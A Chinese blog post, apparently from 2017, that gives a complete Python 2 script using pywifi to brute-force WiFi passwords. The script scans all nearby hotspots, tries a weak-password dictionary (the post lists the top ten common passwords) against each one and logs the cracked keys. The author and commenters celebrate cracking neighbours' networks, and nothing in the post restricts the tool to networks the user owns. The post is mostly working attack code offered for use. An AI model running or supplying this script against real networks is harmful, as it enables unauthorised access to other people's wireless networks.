文档章节

一个非常简单易懂的WIFI密码爆破python脚本

AI3
 AI3
发布于 2017/01/08 23:09
字数 947
阅读 6754
收藏 74

环境准备

  • python2.7
  • 凑合的linux
  • 差不多的无线网卡
  • pywifi模块
  • 弱口令字典
  • 清除系统中的任何wifi连接记录(非常重要!!!)

首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

from pywifi import *
import time
import sys

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP10

  1. 12345678
  2. 123456789
  3. 88888888
  4. 1234567890
  5. 00000000
  6. 87654321
  7. 66668888
  8. 11223344
  9. 147258369
  10. 11111111

配置扫描器

推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里

def main():
	#扫描时常
	scantimes = 3
	#单个密码测试延迟
	testtimes = 15
	output = sys.stdout
	#结果文件保存路径
	files = "TestRes.txt"
	#字典列表
	keys = open(sys.argv[1],"r").readlines()
	print "|KEYS %s"%(len(keys))
	#实例化一个pywifi对象
	wifi = PyWiFi()
	#选择定一个网卡并赋值于iface
	iface = wifi.interfaces()[0]
	#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
	scanres = scans(iface,scantimes)
	#统计附近被发现的热点数量
	nums = len(scanres)
	print "|SCAN GET %s"%(nums)
	print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
	#将每一个热点信息逐一进行测试
	for i,x in enumerate(scanres):
		#测试完毕后,成功的结果讲存储到files中
		res = test(nums-i,iface,x,keys,output,testtimes)
		if res:
			open(files,"a").write(res)

扫描周围热点

def scans(face,timeout):
	#开始扫描
	face.scan()
	time.sleep(timeout)
	#在若干秒后获取扫描结果
	return face.scan_results()

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

def test(i,face,x,key,stu,ts):
	#显示对应网络名称,考虑到部分中文名啧显示bssid
	showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
	#迭代字典并进行爆破
	for n,k in enumerate(key):
		x.key = k.strip()
		#移除所有热点配置
		face.remove_all_network_profiles()
		#讲封装好的目标尝试连接
		face.connect(face.add_network_profile(x))
		#初始化状态码,考虑到用0会发生些逻辑错误
		code = 10
		t1 = time.time()
		#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
		while code!=0 :
			time.sleep(0.1)
			code = face.status()
			now = time.time()-t1
			if now>ts:
				break
			stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n","")))
			stu.flush()
			if code == 4:
				face.disconnect()
				return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k)
	return False

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

  • WIFIID 热点的id号 每跑一个会减1
  • SSID OR BSSID 热点的ssid名或mac地址
  • N 对热点的连接状态,这个在
  • time 当前所花去的时间
  • signal 热点的信号强度,若小越好
  • KEYNUM 测试密码的id 每跑一个会减1
  • KEY 当前测试的密码

输入图片说明

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

传送门

字典 源码 模块

© 著作权归作者所有

共有 人打赏支持
AI3

AI3

粉丝 17
博文 10
码字总数 5959
作品 0
杭州
程序员
加载中

评论(3)

_
_John_Smith_
看了源码,此脚本特点:1)可实时破解,不需要抓包,不在乎是否已经有人再用wifi,没人用抓不到包;2)由于使用单线程破解速度有提高空间,当然这和字典本身有关系;
AI3
AI3
还是得提一下 ,换了个大字典后三分钟跑出一个来……真tm爽
蓝水晶飞机
蓝水晶飞机
:+1:
学Python需要天赋吗?看完弟弟编写的爬虫与爆破脚本,只有汗水!

Python学习记录脚本,希望弟弟通过练习编写脚本一点点提升自己很菜的编程水平~~明天会更好,希望自己越来越强吧。 实现原理 Python3 实现批量查询网站的百度权重以及收录情况,利用的是站长之...

Python新世界
07/24
0
0
国内顶尖白帽子用Python打造渗透工具集,当时花上万购买都被拒!

前言 python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集。 一、信息搜集--py端口扫描小脚本...

诸葛青云999
08/18
0
0
Python爆破校园饮水机系统,喝水还要花钱?不存在的,免费饮水!

论述:此教程只做技术交流,切勿用于其它相关用途。 本人所读大学是那种环境措施等都比较好的,毕竟学费也很贵的,至于相关名称我就不说了。记得大一的时候我们还是在宿舍刷卡饮水,后面有人...

Python新世界
07/19
0
0
破解Zip加密文件常用的几种方法

前言 在互联网的浪潮中,大家也许碰到过这种情况: 从网络上下载了一个zip文件,最后却发现它是用密码保护的,或者自己用密码加密了一个很重要zip文件,但是一段时间后忘记了密码,无法打开。...

Angel_Kitty
07/29
0
0
用 Python 破解 WIFI 密码,走到哪里都能连 WIFI ,就是这么强!

关键时刻,第一时间送达! WIFI 破解,Python 程序员必学技能。WIFI 已经完全普及,现在 Python 程序员没网,走到哪里都不怕!教你们一招,如何在图片中提取 Python 脚本代码。图片发送至手机...

xjtuhit
04/24
0
0

没有更多内容

加载失败,请刷新页面

加载更多

创建第一个react项目

sudo npm i -g create-react-app@1.5.2 create-react-app react-app cd react-apprm -rf package-lock.jsonrm -rf node_modules #主要是为了避免报错npm installnpm start......

lilugirl
今天
1
0
在浏览器中进行深度学习:TensorFlow.js (八)生成对抗网络 (GAN)

Generative Adversarial Network 是深度学习中非常有趣的一种方法。GAN最早源自Ian Goodfellow的这篇论文。LeCun对GAN给出了极高的评价: “There are many interesting recent development...

naughty
今天
0
0
搬瓦工镜像站bwh1.net被DNS污染,国内打不开搬瓦工官网

今天下午(2018年10月17日),继搬瓦工主域名bandwagonhost.com被污染后,这个国内的镜像地址bwh1.net也被墙了。那么目前应该怎么访问搬瓦工官网呢? 消息来源:搬瓦工优惠网->搬瓦工镜像站b...

flyzy2005
今天
3
0
SpringBoot自动配置

本篇介绍下,如何通过springboot的自动配置,将公司项目内的依赖jar,不需要扫描路径,依赖jar的情况下,就能将jar内配置了@configuration注解的类,创建到IOC里面 介绍下开发环境 JDK版本1.8 spr...

贺小五
今天
5
0
命令行新建Maven多项目

参考地址 # DgroupId 可以理解为包名# DartifactId 可以理解为项目名mvn archetype:generate -DgroupId=cn.modfun -DartifactId=scaffold -DarchetypeArtifactId=maven-archetype-quickst......

阿白
今天
2
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部